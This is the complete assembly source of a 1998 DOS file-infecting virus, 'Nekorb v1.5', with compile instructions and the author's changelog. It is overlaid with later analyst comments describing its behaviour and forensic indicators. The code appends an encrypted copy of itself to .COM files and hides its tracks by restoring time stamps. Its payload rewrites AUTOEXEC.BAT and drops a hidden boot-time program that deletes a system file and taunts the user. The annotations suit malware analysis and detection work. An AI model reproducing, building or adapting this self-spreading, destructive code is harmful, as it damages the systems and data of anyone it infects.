|
; ------------------------------------------------------------------------- ;
|
||
|
; Nekorb v1.5 coded by KilJaeden of the Codebreakers 1998 ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; Description: `-------------------| Started: 10/06/98 | Finished: 11/06/98 ;
|
||
|
; `-------------------^------------------- ;
|
||
|
; v1.0 - start with a simple *.com appender | Size: 824 ;
|
||
|
; v1.1 - time / date restoration `---------- ;
|
||
|
; v1.2 - add XOR,NEG,NOT,ROR encryption and directory changing ;
|
||
|
; v1.3 - infects files with any attributes (readonly/hidden/sys) ;
|
||
|
; v1.4 - saves / restores file attributes now ;
|
||
|
; v1.5 - the craziest payload I have ever done... how to explain this...! ;
|
||
|
; - 1: infects all the .coms it can, and then jumps to c:\ ;
|
||
|
; - 2: finds the autoexec.bat file, if there is none, one is created ;
|
||
|
; - 3: infects either the old, or the new, autoexec.bat file replacing ;
|
||
|
; - the first line of it, so it executes a .com every time the ;
|
||
|
; - computer is started up! read only and hides the autoexec.bat ;
|
||
|
; - 4: creates the new .com that the autoexec.bat runs on startup ;
|
||
|
; - 5: that new .com jumps to the \windows\system directory, and ;
|
||
|
; - deletes one file, prints a message, and waits for the infected ;
|
||
|
; - user to press any key (just to make sure they see us) ;
|
||
|
; - the new .com is made read only / hidden as well ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; ----------------------> For Christine Moore <---------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; to compile ::] tasm nekorb.asm ;
|
||
|
; to link :::::] tlink /t nekorb.obj ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
;-----------------------------------------------------------------------
; Analyst note: single-segment .COM image, origin 100h, CS = DS = 'code'.
; The annotations in this listing describe observed behaviour for
; analysis and detection purposes; none of the code has been altered.
;-----------------------------------------------------------------------
code segment                            ; name our segment 'code'
assume cs:code,ds:code                  ; CS and DS both refer to 'code'
org 100h                                ; .COM image: loaded at CS:100h, PSP occupies 0-FFh
|
||
|
|
||
|
;-----------------------------------------------------------------------
; Entry stub.  'blank' is the image entry point (see 'end blank').
; Generation 1: the 3-byte jmp at 'blank' has a zero displacement and
; falls through to 'start'.  In an infected host the same 3-byte pattern
; (see 'newjump') is patched over the host's first instruction and
; transfers control to 'start' in the appended body.
; Register roles: BP = delta offset (runtime address - assembled address);
; every data reference below goes through BP.
;-----------------------------------------------------------------------
blank:  db 0e9h,0,0                     ; near jmp with displacement 0: falls into 'start'
start:  call delta                      ; pushes the address of 'delta'
delta:  pop bp                          ; BP = actual address of 'delta'
        sub bp,offset delta             ; BP = delta offset (0 in the unrelocated generation 1)

encst:  jmp not1st                      ; generation 1 only.  'not1st' overwrites these 3 bytes
                                        ; in memory with the instruction at 'new'
                                        ; (mov cx,finish-encd) before the body is copied to a
                                        ; host, so every later generation runs the
                                        ; decryption path below instead of this jmp
        lea si,[bp+encd]                ; SI = start of the encrypted region (encd..finish)
        mov di,si                       ; decrypt in place: DI = SI
        call encr                       ; CX (byte count) was set by the patched 'encst'
        jmp encd                        ; enter the now-decrypted region
|
||
|
|
||
|
;-----------------------------------------------------------------------
; encr - in-place byte transform used both to encrypt the body before it
; is written to a host and to decrypt it at runtime.
; In:    DS:SI = source, ES:DI = destination (callers pass DI = SI or a
;        scratch area), CX = byte count (callers always pass > 0; 'loop'
;        would wrap on CX = 0), [bp+key] = 8-bit key.
; Out:   CX = 0; SI and DI advanced by the count.  Clobbers AL, flags.
; The operation sequence is a palindrome of self-inverse byte operations
; (not, ror 4, neg, xor, neg, ror 4, not), so applying it twice restores
; the original byte: one routine serves as both encryptor and decryptor.
; Analyst note: the transform is a fixed byte-wise involution keyed by a
; single byte, so an encrypted region can be recovered by trying all 256
; key values.
;-----------------------------------------------------------------------
encr:   lodsb                           ; AL = next byte
        not al                          ; step 1
        ror al,4                        ; step 2 (nibble swap)
        neg al                          ; step 3
        xor al,byte ptr [bp+key]        ; step 4 - the only keyed step
        neg al                          ; mirror of step 3
        ror al,4                        ; mirror of step 2
        not al                          ; mirror of step 1
        stosb                           ; store transformed byte at ES:DI
        loop encr                       ; repeat for CX bytes
        ret

key     db 0                            ; 8-bit key; a fresh value is taken from the PIT counter
                                        ; per infection (see 'in al,40h' in 'infect').  Lives in
                                        ; the plaintext part of the body (start..encd), so it is
                                        ; readable from any infected file.
|
||
|
|
||
|
;-----------------------------------------------------------------------
; encd - first instruction of the encrypted region (encd..finish).
; Restores the host's original first 3 bytes at CS:100h, pushes 100h so
; the final 'retn' in 'exit' returns into the host, then moves the DTA
; into the body so find-first/next records land in [bp+dta].
;-----------------------------------------------------------------------
encd:   lea si,[bp+buffer]              ; SI = saved copy of the host's first 3 bytes
        mov di,100h                     ; DI = host entry point
        push di                         ; return address consumed by 'retn' in 'exit'
        movsw                           ; restore bytes 0-1
        movsb                           ; restore byte 2

        lea dx,[bp+offset dta]          ; DX = private DTA inside the body
        mov ah,1ah                      ; DOS set DTA
        int 21h                         ; subsequent directory searches write to [bp+dta]
|
||
|
|
||
|
;-----------------------------------------------------------------------
; first/next - directory walk.  Searches "*.com" ('comfile') in the
; current directory; each match is handed to 'infect', which comes back
; to 'next' with AH = 4Fh (find next).  When a directory is exhausted the
; code does chdir ".." and searches again; when that chdir fails (root
; reached) it runs 'pload'.
; Analyst note: the walk only goes upward, from the infected program's
; current directory to the root of the current drive.
;-----------------------------------------------------------------------
first:  mov ah,4eh                      ; DOS find first
        lea dx,[bp+comfile]             ; DX = "*.com" (the data-area comment says "*.c*"; the string is "*.com")
        mov cx,7                        ; attribute mask: read-only | hidden | system

next:   int 21h                         ; AH = 4Eh (find first) or 4Fh (find next)
        jnc infect                      ; CF clear: a match is in [bp+dta]
        mov ah,3bh                      ; DOS chdir
        lea dx,[bp+updir]               ; DX = ".."
        int 21h
        jnc first                       ; moved up one level: search it
        jmp pload                       ; chdir failed (already at the root): payload
|
||
|
|
||
|
;-----------------------------------------------------------------------
; infect - append the body to the file described by [bp+dta].
; In:    [bp+dta] = find record (ASCIIZ name at +1Eh, size at +1Ah),
;        BP = delta offset.
; Stack: pushes attributes / name / DS (#1-#3) and time / date (#4-#5) on
;        entry; 'shutup' pops all five, so every path into 'shutup' must
;        have them pushed.
; Host selection (uses only the file size and its first 3 bytes):
;   - skipped if size == (jump displacement at byte 1) + body size + 3;
;     this equality holds for a file this code has already infected
;   - skipped if size < 1000 or size > 62000 (low word of the size only)
; Changes to an accepted host (forensic indicators):
;   - attributes cleared for the write, then restored
;   - bytes 0-2 overwritten with E9 xx xx (jmp to original EOF - 3)
;   - the original bytes 0-2 are kept inside the appended body ('buffer')
;   - body appended: start..encd as plaintext (including 'key'),
;     encd..finish transformed by 'encr' with a fresh key
;   - time/date stamp restored via 5701h, so the modification time does
;     not change; the size growth of finish-start bytes is the indicator
;-----------------------------------------------------------------------
infect: lea dx,[bp+offset dta+1eh]      ; DX = ASCIIZ file name from the DTA record
        mov ax,4300h                    ; DOS get attributes -> CX
        int 21h
        push cx                         ; #1 original attributes
        push dx                         ; #2 file name pointer
        push ds                         ; #3 DS (never changed below)

        mov ax,4301h                    ; DOS set attributes
        xor cx,cx                       ; clear read-only/hidden/system so the open succeeds
        int 21h

        call open                       ; BX = handle, opened read/write

        mov ax,5700h                    ; DOS get file time/date -> CX:DX
        int 21h
        push dx                         ; #4 date
        push cx                         ; #5 time

        mov ah,3fh                      ; DOS read
        lea dx,[bp+buffer]              ; into 'buffer', which travels with the body
        mov cx,3                        ; the host's first 3 bytes
        int 21h

        mov ax,word ptr [bp+dta+1ah]    ; AX = low word of the file size
        mov cx,word ptr [bp+buffer+1]   ; CX = 16-bit displacement of the host's first jmp, if any
        add cx,finish-start+3           ; CX = size the file would have if already infected
        cmp ax,cx
        jz shutup                       ; self-recognition hit: restore and leave
        cmp ax,1000                     ; lower bound (decimal)
        jb shutup                       ; unsigned compare: too small
        cmp ax,62000                    ; upper bound (decimal)
        ja shutup                       ; too big

        sub ax,3                        ; displacement for a jmp at 100h to the old EOF
        mov word ptr [bp+newjump+1],ax  ; patch into the E9 xx xx template

        mov al,00h                      ; seek method 0 = from start
        call scan
        mov ah,40h                      ; DOS write
        lea dx,[bp+newjump]             ; the 3-byte jmp
        mov cx,3
        int 21h                         ; host bytes 0-2 are now E9 xx xx

        mov al,02h                      ; seek method 2 = from end
        call scan

        in al,40h                       ; PIT channel 0 counter byte, used as a pseudo-random key
        mov byte ptr [bp+key],al        ; key for this copy; written out with start..encd below

        mov ah,40h                      ; DOS write
        lea dx,[bp+start]               ; plaintext part of the body
        mov cx,encd-start               ; up to, not including, the encrypted region
        int 21h

        lea di,[bp+finish]              ; DI = scratch area just past the body (the not1st/new stub)
        push di                         ; #6 destination of the transformed copy
        lea si,[bp+encd]                ; SI = start of the region to transform
        mov cx,finish-encd              ; byte count
        push cx                         ; #7
        call encr                       ; transformed copy at [bp+finish]; the in-memory original stays plaintext

        mov ah,40h                      ; DOS write
        pop cx                          ; #7 byte count
        pop dx                          ; #6 DX = transformed copy
        int 21h

shutup: mov ax,5701h                    ; DOS set file time/date
        pop cx                          ; #5 time
        pop dx                          ; #4 date
        int 21h                         ; stamp restored: mtime is not an indicator here

        mov ax,4301h                    ; DOS set attributes
        pop ds                          ; #3
        pop dx                          ; #2 file name
        pop cx                          ; #1 original attributes
        int 21h

        call close
        mov ah,4fh                      ; DOS find next, using the record still in [bp+dta]
        jmp next
|
||
|
|
||
|
;-----------------------------------------------------------------------
; exit - restore the default DTA (PSP:80h) and return into the host.
; 'retn' pops the 100h pushed in 'encd'; the host's original first 3
; bytes were restored there, so the host runs as if unmodified.
;-----------------------------------------------------------------------
exit:   mov dx,80h                      ; DX = default DTA inside the PSP
        mov ah,1ah                      ; DOS set DTA
        int 21h
        retn                            ; -> CS:100h (pushed in 'encd')
|
||
|
|
||
|
; ---------------------------( The Payload )------------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
;-----------------------------------------------------------------------
; pload - reached only after the directory walk reaches the root.
; Selects drive C:, moves to its root and makes sure an AUTOEXEC.BAT
; exists there (creating an empty one if absent) so that 'infkt' has a
; file to modify.
; Analyst note: neither the find nor the create result is checked, so if
; the create fails (e.g. root not writable) this loop never terminates.
;-----------------------------------------------------------------------
pload:  mov ah,0eh                      ; DOS select default drive
        mov dl,2                        ; 0 = A, 1 = B, 2 = C
        int 21h
        mov ah,3bh                      ; DOS chdir
        lea dx,[bp+rootdir]             ; DX = "\"
        int 21h

find:   mov ah,4eh                      ; DOS find first
        lea dx,[bp+autoexe]             ; DX = "autoexec.bat"
        mov cx,7                        ; match read-only/hidden/system entries too
        int 21h
        jnc infkt                       ; exists (possibly hidden): modify it

        mov ah,3ch                      ; DOS create/truncate
        lea dx,[bp+autoexe]
        xor cx,cx                       ; normal attributes
        int 21h                         ; the handle returned in AX is not used or closed here
        jmp find                        ; search again so the DTA record describes the new file
|
||
|
|
||
|
;-----------------------------------------------------------------------
; infkt - payload part 1: modify C:\AUTOEXEC.BAT and drop WINSYS.COM.
; In:    [bp+dta] = find record for autoexec.bat (name at +1Eh).
; Changes on disk (forensic indicators):
;   - C:\AUTOEXEC.BAT: first 13 bytes overwritten in place with
;     ".\winsys.com" + LF (the file is opened, not truncated, so the rest
;     of the original content remains, minus whatever those 13 bytes were);
;     attributes set to read-only | hidden (03h)
;   - C:\WINSYS.COM created with the contents pstrt..pend, attributes 03h
; Then jumps to 'exit' to return into the host.
;-----------------------------------------------------------------------
infkt:  lea dx,[bp+offset dta+1eh]      ; DX = "AUTOEXEC.BAT" as found
        push dx                         ; #8
        mov ax,4301h                    ; DOS set attributes
        xor cx,cx                       ; clear all so the read/write open succeeds
        int 21h
        call open                       ; BX = handle; file pointer at offset 0

        mov ah,40h                      ; DOS write
        lea dx,[bp+newline]             ; ".\winsys.com",LF,CR,'$'
        mov cx,13                       ; only the 12-character path plus LF are written; CR and '$' are not
        int 21h                         ; overwrites in place, does not insert

        pop dx                          ; #8 file name
        mov ax,4301h                    ; DOS set attributes
        mov cx,3                        ; read-only | hidden
        int 21h

        call close

        mov ah,3ch                      ; DOS create/truncate
        lea dx,[bp+pldfile]             ; DX = "winsys.com"
        push dx                         ; #9
        xor cx,cx                       ; normal attributes
        int 21h                         ; handle in AX is not used; 'open' below reopens the file

        mov ah,4eh                      ; DOS find first
        pop dx                          ; #9 "winsys.com"
        mov cx,7
        int 21h                         ; fills [bp+dta] with the new file's record

        lea dx,[bp+offset dta+1eh]      ; DX = the name as DOS returned it
        push dx                         ; #10
        call open                       ; BX = handle

        mov ah,40h                      ; DOS write
        lea dx,[bp+pstrt]               ; the standalone payload program image
        mov cx,pend-pstrt
        int 21h

        pop dx                          ; #10 file name
        mov ax,4301h                    ; DOS set attributes
        mov cx,3                        ; read-only | hidden
        int 21h

        call close
        jmp exit                        ; back into the host
|
||
|
|
||
|
; ---------------------( Remotely Called Procedures )---------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
;-----------------------------------------------------------------------
; close - DOS close handle.  In: BX = handle.  Clobbers AX, flags.
;-----------------------------------------------------------------------
close:  mov ah,3eh                      ; DOS close
        int 21h
        ret
|
||
|
|
||
|
;-----------------------------------------------------------------------
; open - DOS open existing file, read/write access.
; In:    DS:DX = ASCIIZ file name.
; Out:   BX = handle (AX and BX are swapped).  CF is not checked by any
;        caller, so on failure BX holds the DOS error code instead.
;-----------------------------------------------------------------------
open:   mov ax,3d02h                    ; AL = 02h: read/write
        int 21h                         ; AX = handle (or error code)
        xchg bx,ax                      ; BX = handle
        ret
|
||
|
|
||
|
;-----------------------------------------------------------------------
; scan - DOS lseek to offset 0 relative to the method in AL.
; In:    AL = 0 (file start) or 2 (file end) as set by the callers,
;        BX = handle.
; Out:   DX:AX = new file position.  Clobbers CX, DX.
;-----------------------------------------------------------------------
scan:   mov ah,42h                      ; DOS lseek; AL (method) left as the caller set it
        xor cx,cx                       ; offset high word = 0
        cwd                             ; DX = 0 (AX = 42xxh is non-negative): offset low word
        int 21h
        ret
|
||
|
|
||
|
; -----------------------( The Payload Data Area )------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
;-----------------------------------------------------------------------
; pstrt..pend - image of the dropped C:\WINSYS.COM, launched from
; AUTOEXEC.BAT on every boot.  It is a separate .COM program with its own
; jmp stub and delta offset, and it uses the default DTA at PSP:80h
; (file name field at 9Eh).
; Behaviour (forensic indicators):
;   - chdir \windows\system on the current drive
;   - find first "*.*" and delete whichever entry DOS returns first;
;     no name is chosen, and the result of the delete is not checked
;   - chdir \, print 'paymsg', block on a keypress, terminate via int 20h
; The 20 blank lines at the start of 'paymsg' scroll the screen so the
; launching command line is no longer visible above the text.
;-----------------------------------------------------------------------
pstrt:  db 0e9h,0,0                     ; same 3-byte jmp stub as 'blank'
        call paydel                     ; pushes the address of 'paydel'
paydel: pop bp
        sub bp,offset paydel            ; BP = delta offset of this image

        mov ah,3bh                      ; DOS chdir
        lea dx,[bp+winsys]              ; "\windows\system"
        int 21h                         ; result not checked: on failure the search and delete
                                        ; below operate on the current directory instead

        mov ah,4eh                      ; DOS find first
        lea dx,[bp+anyfile]             ; "*.*"
        mov cx,7                        ; include read-only/hidden/system entries
        int 21h                         ; record lands in the default DTA at PSP:80h

        mov ah,41h                      ; DOS delete
        mov dx,9eh                      ; DX = name field of the default DTA (80h + 1Eh)
        int 21h                         ; result not checked

        mov ah,3bh                      ; DOS chdir
        lea dx,[bp+root]                ; "\"
        int 21h

        mov ah,09h                      ; DOS print '$'-terminated string
        lea dx,[bp+paymsg]
        int 21h
        mov ah,00h                      ; BIOS read key (blocks until a key is pressed)
        int 16h
        int 20h                         ; terminate program

anyfile db '*.*',0                      ; search pattern
winsys  db "\windows\system",0          ; directory the delete runs in
root    db "\",0
paymsg  db '',10,13                     ; 20 x (LF,CR): pushes the launching command off screen
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db '',10,13
        db 'Infected by Nekorb coded by KilJaeden of the Codebreakers on 10/06/98 - 11/06/98',10,13
        db '::Each time you start your computer, an innocent file is sacrificed to my god.::',10,13,'$'
pend:                                   ; end of the dropped image
|
||
|
|
||
|
; --------------------------( The Data Area )------------------------------ ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
;-----------------------------------------------------------------------
; Data area.  Everything from 'encd' to 'finish', including these
; strings, is part of the encrypted region written to each host, so the
; plaintext strings are not visible in an infected file; they appear only
; in memory after 'encr' has run, or in a generation-1 image.
;-----------------------------------------------------------------------
newline db '.\winsys.com',10,13,'$'     ; written over the start of AUTOEXEC.BAT (first 13 bytes only; see 'infkt')
updir   db "..",0                       ; chdir target for the upward directory walk
comfile db "*.com",0                    ; find-first pattern (the original comment said "*.c*")
autoexe db 'autoexec.bat',0             ; file searched for / created in the root of C:
buffer  db 0cdh,20h,0                   ; the host's original first 3 bytes.  In generation 1 this is
                                        ; int 20h + 0, so restoring it makes the bare image exit cleanly.
rootdir db "\",0
pldfile db 'winsys.com',0               ; name of the dropped payload file
newjump db 0e9h,0,0                     ; template E9 + 16-bit displacement, patched in 'infect'
dta     db 43 dup (?)                   ; private DTA (43-byte DOS find record)
finish  label near                      ; end of the body that is copied to hosts
|
||
|
|
||
|
; ---------------------( Not Saved / Not Encrypted )----------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
;-----------------------------------------------------------------------
; Generation-1-only code.  Lies past 'finish', so it is never copied to a
; host; it exists only in the original image (and its memory is reused by
; 'infect' as scratch space for the transformed copy).
; Patches the 3 bytes at 'encst' with the instruction at 'new' so that
; later generations take the decryption path, then enters the region at
; 'encd', which is still plaintext in this generation.
;-----------------------------------------------------------------------
not1st: lea di,[bp+encst]               ; DI = the 'jmp not1st' at 'encst'
        lea si,[bp+new]                 ; SI = replacement instruction bytes
        movsw                           ; copy 3 bytes (B9 imm16 over E9 rel16)
        movsb
        jmp encd                        ; no 'encr' call: the region is plaintext in generation 1

new:    mov cx,finish-encd              ; the 3-byte instruction copied over 'encst'; it sets CX
                                        ; (byte count) for the 'call encr' that follows 'encst'
|
||
|
|
||
|
; -----------------------------( The End )--------------------------------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
|
||
|
code ends                               ; end of the 'code' segment
end blank                               ; entry point = 'blank' (CS:100h)
|
||
|
|
||
|
; ------------------------------------------------------------------------- ;
|
||
|
; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
|
||
|
; ------------------------------------------------------------------------- ;
|